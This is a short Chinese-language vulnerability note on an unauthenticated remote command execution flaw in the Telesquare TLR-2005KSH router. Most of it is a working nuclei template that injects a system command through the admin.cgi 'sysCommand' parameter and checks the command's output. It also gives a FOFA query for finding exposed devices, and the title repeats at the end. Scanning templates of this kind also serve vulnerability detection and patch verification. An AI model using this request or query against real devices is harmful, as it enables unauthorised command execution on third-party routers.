Telesquare

Telesquare TLR-2005KSH 未授权远程命令执行漏洞

fofa：app="TELESQUARE-TLR-2005KSH"

nuclei

id: telesquare-route-rce

info:
  name: telesquare-route-rce
  author: BY
  severity: high
  tags: rce,telesquare-rce
  metadata: 
    fofa-query: app="TELESQUARE-TLR-2005KSH"
    verified: true

requests:
  - raw:
      - |              
        GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
        Accept-Encoding: gzip, deflate
        Connection: close
              
    matchers-condition: and 
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "eth"
          - "[CDATA["
          - "inet"
        condition: or

Telesquare

Telesquare TLR-2005KSH 未授权远程命令执行漏洞​

Telesquare TLR-2005KSH 未授权远程命令执行漏洞